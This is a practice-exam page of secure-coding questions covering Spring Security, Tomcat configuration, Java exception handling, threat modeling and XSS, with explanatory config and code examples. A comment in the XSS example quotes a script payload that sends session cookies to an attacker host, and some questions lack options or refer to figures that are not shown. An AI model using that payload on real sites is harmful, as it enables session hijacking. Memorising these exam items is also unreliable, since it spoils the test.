Which of the following Spring Security Framework configuration settings ensures protection from session fixation attacks by not allowing an authenticated user to log in again?
A. session-fixation-protection="newSessionID"
B. session-fixation-protection="migrateSession"
C. session-fixation-protection="enabled"
D. session-fixation-protection="protectSession"
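For reference, the values Spring Security's XML namespace actually accepts for this attribute are none, newSession, migrateSession and (since 3.2) changeSessionId; "newSessionID", "enabled" and "protectSession" are not recognised values. The same strategies expressed in Java configuration, as an added example that is not part of the original question (it assumes Spring Security 6 with the lambda DSL; the "/login" page path is an assumption, the class and method names are the framework's own):

```java
// Added example (not from the page): Spring Security Java configuration showing the
// session-fixation strategies that correspond to the XML attribute
//   <http ... session-fixation-protection="migrateSession">
// Assumes Spring Security 6.x; the login page path is illustrative.
import org.springframework.context.annotation.Bean;
import org.springframework.context.annotation.Configuration;
import org.springframework.security.config.annotation.web.builders.HttpSecurity;
import org.springframework.security.config.annotation.web.configuration.EnableWebSecurity;
import org.springframework.security.web.SecurityFilterChain;

@Configuration
@EnableWebSecurity
public class SessionFixationConfig {

    @Bean
    public SecurityFilterChain filterChain(HttpSecurity http) throws Exception {
        http
            .authorizeHttpRequests(auth -> auth.anyRequest().authenticated())
            .formLogin(form -> form.loginPage("/login").permitAll())
            .sessionManagement(session -> session
                // Strategies available here (XML attribute value in parentheses):
                //   none()            ("none")            keep the pre-login session id: vulnerable
                //   newSession()      ("newSession")      new session on login, attributes NOT copied
                //   migrateSession()  ("migrateSession")  new session on login, attributes copied
                //   changeSessionId() ("changeSessionId") same session object, new id (Servlet 3.1+, the default)
                // All four except none() invalidate the id an attacker planted before login.
                .sessionFixation(fixation -> fixation.migrateSession())
                // Separate concern, often confused with fixation: limit sessions per
                // principal and reject a second login instead of expiring the first one.
                .maximumSessions(1)
                .maxSessionsPreventsLogin(true)
            );
        return http.build();
    }
}
```

Note that none of the fixation strategies prevents a user from logging in a second time; that behaviour comes from the concurrency control (maximumSessions / maxSessionsPreventsLogin) shown at the end of the block, which needs an HttpSessionEventPublisher registered so expired sessions are tracked.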
This exam has 49 community-verified practice questions.
Topics covered:
- Understanding Application Security, Threats, and Attacks
- Security Requirements Gathering
- Secure Application Design and Architecture
- Secure Coding Practices for Input Validation
- Secure Coding Practices for Authentication and Authorization
- Secure Coding Practices for Cryptography
- Secure Coding Practices for Session Management
- Secure Coding Practices for Error Handling
- Static and Dynamic Application Security Testing (SAST & DAST)
- Secure Deployment and Maintenance
Oliver is a web server admin and wants to configure the Tomcat server so that it does not serve directory index pages when a directory has no welcome file. Which of the following settings in CATALINA_HOME/conf/web.xml will solve his problem?
Which of the following configuration settings in server.xml allows a Tomcat server administrator to impose a size limit on uploaded files?
A. <Connector ... maxFileLimit="file size" />
B. <Connector ... maxPostSize="0" />
C. <Connector ... maxFileSize="file size" />
D. <Connector ... maxPostSize="file size" />
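A caveat a practitioner should know before relying on maxPostSize: it bounds the POST body that Tomcat parses as form (application/x-www-form-urlencoded) parameters; it is not a file-upload limit. Multipart uploads are limited by the servlet's multipart-config (or @MultipartConfig). Both shown together as an added example that is not from the page; sizes, the upload servlet name and the temp directory are assumptions:

```xml
<!-- Added example, not from the page. Sizes and names are illustrative. -->

<!-- CATALINA_HOME/conf/server.xml -->
<!-- maxPostSize: bytes of a POST body Tomcat will parse as FORM URL parameters; anything larger
     is rejected and the parameters are not parsed. Default 2097152 (2 MB).
     Tomcat 7: 0 or a negative value disables the limit (so option B above removes the limit,
     it does not impose one). Tomcat 8.5+: only a negative value disables it.
     maxSwallowSize: how much of a rejected body Tomcat reads before closing the connection,
     so an oversized upload cannot keep the connection busy. -->
<Connector port="8080" protocol="HTTP/1.1"
           connectionTimeout="20000"
           redirectPort="8443"
           maxPostSize="1048576"
           maxSwallowSize="2097152" />

<!-- WEB-INF/web.xml: the limit that actually applies to multipart/form-data uploads.
     Exceeding max-file-size or max-request-size makes getPart()/getParts() fail with an
     exception instead of silently truncating. -->
<servlet>
  <servlet-name>upload</servlet-name>
  <servlet-class>com.example.UploadServlet</servlet-class>
  <multipart-config>
    <location>/var/tmp/uploads</location>
    <max-file-size>5242880</max-file-size>        <!-- 5 MiB per file -->
    <max-request-size>10485760</max-request-size> <!-- 10 MiB for the whole request -->
    <file-size-threshold>0</file-size-threshold>  <!-- write parts to disk immediately -->
  </multipart-config>
</servlet>
```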
Which of the following authentication mechanisms does J2EE support?
A. Windows, Form-based, Role-based, Client/Server Mutual Authentication
C. HTTP Basic, Form-based, Client/Server Mutual, Role-based Authentication
D. HTTP Basic, Form-based, Client/Server Mutual, HTTP Digest Authentication
To enable the Struts validator on an application, which configuration setting should be applied in the Struts validator configuration file?
A. validate="true"
B. IsNotvalidate="disabled"
C. IsNotvalidate="false"
D. validate="enabled"
Which of the following can be derived from abuse cases to elicit security requirements for a software system?
A. Misuse cases
B. Data flow diagram
C. Use cases
D. Security use cases
Alice, a Tomcat server administrator, wants to ensure that Tomcat can be shut down only by the user who owns the Tomcat process. Select the setting in CATALINA_HOME/conf/server.xml that will enable her to do so.
A. <Server port="" shutdown="">
B. <Server port="-1" shutdown="">
C. <Server port="-1" shutdown="SHUTDOWN">
D. <Server port="8080" shutdown="SHUTDOWN">
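The shutdown port is a plain TCP listener: whoever can connect to it and send the configured command string stops the server. The default and two hardened alternatives, as an added example that is not from the page (the random command string is a placeholder; the rest of the Server element is unchanged from the shipped file):

```xml
<!-- Added example, not from the page: the opening Server element of
     CATALINA_HOME/conf/server.xml. Only this start tag changes; the nested
     Service/Connector/Engine elements stay as shipped. -->

<!-- Weak (the default): a known port and a well-known command string. Any local user,
     and anything that can reach TCP 8005, can stop Tomcat. -->
<Server port="8005" shutdown="SHUTDOWN">

<!-- Hardened, option 1: disable the shutdown listener. Tomcat can then be stopped only by
     signalling the process (kill, systemctl stop, or catalina.sh stop -force with
     CATALINA_PID set), which needs the rights of the user that owns the process.
     A plain "catalina.sh stop" no longer works in this mode. -->
<Server port="-1" shutdown="SHUTDOWN">

<!-- Hardened, option 2: keep the listener but bind it to loopback (address defaults to
     localhost anyway; say so explicitly) and use a long random command string that is
     not the default and is kept out of version control. -->
<Server port="8005" address="127.0.0.1" shutdown="replace-with-a-long-random-string">
```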
James is a Java developer working at INFR INC. He has written Java code that opens a file, reads it line by line and displays its content in a text editor. He wants to ensure that any unhandled exception raised by the code automatically closes the opened file stream. Which of the following exception handling blocks should he use?
A. Try-Catch-Finally block
B. Try-Catch block
C. Try-With-Resources block
D. Try-Catch-Resources block
Identify which of the following should NOT be caught while handling exceptions.
A. EOFException
B. SecurityException
C. IllegalAccessException
D. NullPointerException
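The two questions above are two sides of the same method: close the stream on every exit path, and catch only the failures you can act on. The following is an added example that is not from the page, covering both (the file path is an assumption; the guidance on NullPointerException follows CERT ERR08-J, "Do not catch NullPointerException or any of its ancestors"):

```java
// Added example (not from the page): reading a file line by line, before and after.
// The input path is illustrative.
import java.io.BufferedReader;
import java.io.IOException;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.NoSuchFileException;
import java.nio.file.Path;
import java.util.ArrayList;
import java.util.List;

public class FileReading {

    // Before: the stream is closed only on the happy path. If readLine() throws,
    // or a RuntimeException escapes the loop, the file handle is leaked.
    static List<String> readLeaky(Path path) throws IOException {
        BufferedReader reader = Files.newBufferedReader(path, StandardCharsets.UTF_8);
        List<String> lines = new ArrayList<>();
        String line;
        while ((line = reader.readLine()) != null) {
            lines.add(line);
        }
        reader.close();   // never reached if anything above throws
        return lines;
    }

    // After: try-with-resources. Each resource declared in the parentheses implements
    // AutoCloseable and is closed automatically, in reverse order, when the block exits,
    // whether normally or by an exception, and before any catch or finally runs. If
    // close() itself throws, that exception is attached to the original one as a
    // suppressed exception instead of replacing it.
    static List<String> readSafely(Path path) throws IOException {
        List<String> lines = new ArrayList<>();
        try (BufferedReader reader = Files.newBufferedReader(path, StandardCharsets.UTF_8)) {
            String line;
            while ((line = reader.readLine()) != null) {
                lines.add(line);
            }
        } catch (NoSuchFileException e) {
            // Catch the specific checked failure you can act on, and do not echo the
            // full path back to the user: the file name is enough for the message.
            throw new IOException("input file missing: " + path.getFileName(), e);
        }
        // Deliberately NOT caught here: NullPointerException (or RuntimeException /
        // Exception / Throwable). A NullPointerException is a programming error;
        // swallowing it hides the bug and leaves the program in an undefined state.
        return lines;
    }

    public static void main(String[] args) throws IOException {
        Path path = Path.of(args.length > 0 ? args[0] : "input.txt");
        for (String line : readSafely(path)) {
            System.out.println(line);
        }
    }
}
```

A try/catch/finally with reader.close() in the finally block also closes the stream, but it needs a null check, and an exception from close() in the finally block would overwrite the original exception; try-with-resources handles both for you.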
Which of the following relationships is used to describe a security use case scenario?
A. Threatens Relationship
B. Extend Relationship
C. Mitigates Relationship
D. Include Relationship
Which of the following DFD components is used to represent a change in privilege level?
A. 3
B. 4
C. 1
D. 2
Alice, a security engineer, was performing security testing on an application. She found that users can view the website structure and file names. Per standard security practice this poses a serious risk, because attackers can reach hidden script files in the directory. Which of the following will mitigate this risk?
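Both Oliver's question above (serving index pages when no welcome file exists) and Alice's finding here (users can browse the site structure) are the same Tomcat setting: the listings init-param of the default servlet in CATALINA_HOME/conf/web.xml. The relevant fragment, as an added example that is not from the page (the welcome-file-list is shown because the question refers to it; the rest of the servlet element is as shipped):

```xml
<!-- Added example, not from the page: the default servlet in CATALINA_HOME/conf/web.xml.
     Only the listings parameter is security-relevant; keep the rest of the element as shipped. -->
<servlet>
  <servlet-name>default</servlet-name>
  <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
  <init-param>
    <param-name>debug</param-name>
    <param-value>0</param-value>
  </init-param>
  <!-- listings=false: when a directory has no welcome file, Tomcat returns 404 instead of
       an auto-generated index. listings=true (the weak setting) reveals every file and
       sub-directory under the webroot, including scripts, backups and configuration
       that were never meant to be linked. -->
  <init-param>
    <param-name>listings</param-name>
    <param-value>false</param-value>
  </init-param>
  <load-on-startup>1</load-on-startup>
</servlet>

<!-- The welcome files Tomcat looks for before deciding whether a listing applies.
     A directory that contains one of these never shows a listing regardless of the
     setting above; one that does not, does, unless listings is false. -->
<welcome-file-list>
  <welcome-file>index.html</welcome-file>
  <welcome-file>index.htm</welcome-file>
  <welcome-file>index.jsp</welcome-file>
</welcome-file-list>
```

The same init-param can be set per application in the web app's own WEB-INF/web.xml, which overrides the global default, so check both places when auditing.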
Which of the following risk assessment models is used to rate threat-based risk to the application during the threat modeling process?
A. DREAD
B. SMART
C. STRIDE
D. RED
Which line of the following example Java code can make the application vulnerable to a session attack?
A. Line No. 1
B. Line No. 3
C. Line No. 4
D. Line No. 5
Which of the following methods checks whether the DEBUG log level is enabled?
A. isDebugEnabled()
B. EnableDebug()
C. IsEnableDebug()
D. DebugEnabled()
Which of the following Connector settings in server.xml ensures that session cookies are transmitted over an encrypted channel?
A. <Connector IsSSLEnabled="Yes" />
B. <Connector EnableSSL="true" />
C. <Connector SSLEnabled="false" />
D. <Connector SSLEnabled="true" />
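Two settings work together here, in two different files: the Connector attribute SSLEnabled="true" (server.xml) makes Tomcat speak TLS on that port, while the cookie-config element of session-config (web.xml, Servlet 3.0+) sets the Secure flag so the browser refuses to send the session cookie over plain HTTP at all. Both as an added example that is not from the page (port, keystore path and the placeholder password are assumptions):

```xml
<!-- Added example, not from the page. Port, keystore file and password are illustrative. -->

<!-- CATALINA_HOME/conf/server.xml: an HTTPS connector (Tomcat 8.5+ syntax).
     SSLEnabled="true" turns on TLS; scheme/secure tell the servlet API the request is secure. -->
<Connector port="8443" protocol="org.apache.coyote.http11.Http11NioProtocol"
           SSLEnabled="true" scheme="https" secure="true"
           maxThreads="150">
  <SSLHostConfig protocols="TLSv1.2,TLSv1.3">
    <Certificate certificateKeystoreFile="conf/keystore.p12"
                 certificateKeystorePassword="replace-me"
                 type="RSA"/>
  </SSLHostConfig>
</Connector>

<!-- WEB-INF/web.xml: the element that actually marks the cookie.
     secure=true: the browser sends JSESSIONID only over HTTPS.
     http-only=true: script cannot read it, which limits the damage of an XSS.
     tracking-mode COOKIE: never fall back to putting the session id in the URL. -->
<session-config>
  <session-timeout>15</session-timeout>
  <cookie-config>
    <http-only>true</http-only>
    <secure>true</secure>
  </cookie-config>
  <tracking-mode>COOKIE</tracking-mode>
</session-config>
```

Enabling TLS on a connector without the Secure flag still leaves the cookie exposed if the same application is also reachable over an HTTP connector; a transport-guarantee of CONFIDENTIAL on the protected URLs closes that gap by redirecting HTTP to HTTPS.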
In which phase of the secure development lifecycle is threat modeling performed?
A. Coding phase
B. Testing phase
C. Deployment phase
D. Design phase
Identify the type of attack depicted in the figure below:
A. XSS
B. Cross-Site Request Forgery (CSRF) attack
C. SQL injection attack
D. Denial-of-Service attack
Stephen is a web developer at InterCall Systems. He was working on a real estate website for one of his clients and was given the task of designing a web page with a property search feature. He designed the following searchpage.jsp:
<form id="form1" method="post" action="SearchProperty.jsp">
  <input type="text" id="txt_Search" name="txt_Search" placeholder="Search Property..." />
  <input type="submit" id="Btn_Search" value="Search" />
</form>
However, when the application reached the security testing phase, the tester found an XSS vulnerability on this page. How can he mitigate the XSS vulnerability on this page?
A. He should write code like out.write("You Searched for: " + ESAPI.encoder().encodeForHTML(search));
B. He should write code like out.write("You Searched for: " + request.getParameter("search").toString());
C. He should write code like out.write("You Searched for: " + request.getParameter("txt_Search").toString());
D. He should write code like out.write("You Searched for: " + search);
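The vulnerability is in SearchProperty.jsp, not in the form: whatever arrives in txt_Search is written back into the HTML response unencoded. The handler rewritten as a servlet, showing the reflected output before and after output encoding, as an added example that is not from the page (it assumes the ESAPI and OWASP Java Encoder jars are on the classpath; the servlet mapping and the markup around the echoed value are assumptions):

```java
// Added example (not from the page): the SearchProperty handler as a servlet.
// Assumes the ESAPI and OWASP Java Encoder libraries are available; the servlet
// mapping and surrounding markup are illustrative.
import java.io.IOException;
import java.io.PrintWriter;
import javax.servlet.ServletException;
import javax.servlet.annotation.WebServlet;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import org.owasp.encoder.Encode;
import org.owasp.esapi.ESAPI;

@WebServlet("/SearchProperty")
public class SearchPropertyServlet extends HttpServlet {

    @Override
    protected void doPost(HttpServletRequest request, HttpServletResponse response)
            throws ServletException, IOException {
        // "txt_Search" is the name attribute of the form field, so this is the key to read;
        // request.getParameter("search") (option B) would simply return null.
        String search = request.getParameter("txt_Search");
        if (search == null) {
            search = "";
        }
        response.setContentType("text/html;charset=UTF-8");
        PrintWriter out = response.getWriter();

        // Vulnerable (what the tester found): the parameter is reflected verbatim, so a
        // value such as
        //   <script>document.location='https://attacker.example/?c='+document.cookie</script>
        // runs in the browser of anyone who submits, or is tricked into submitting, it.
        // out.write("You Searched for: " + search);

        // Fixed (the page's option A): encode for the HTML body context before reflecting.
        out.write("<p>You Searched for: " + ESAPI.encoder().encodeForHTML(search) + "</p>");

        // Same fix with the lighter OWASP Java Encoder. Choose the method for the context
        // the data lands in: forHtml for element content, forHtmlAttribute inside a quoted
        // attribute, forJavaScript inside a script block. Encoding for the wrong context
        // is still XSS.
        out.write("<input type=\"text\" name=\"txt_Search\" value=\""
                + Encode.forHtmlAttribute(search) + "\">");
    }
}
```

In the JSP itself the same effect is obtained with ${fn:escapeXml(param.txt_Search)} or the OWASP Java Encoder JSP tag library; the point of option A over C and D is that encoding happens at the output, where the context is known, rather than relying on the raw parameter being harmless.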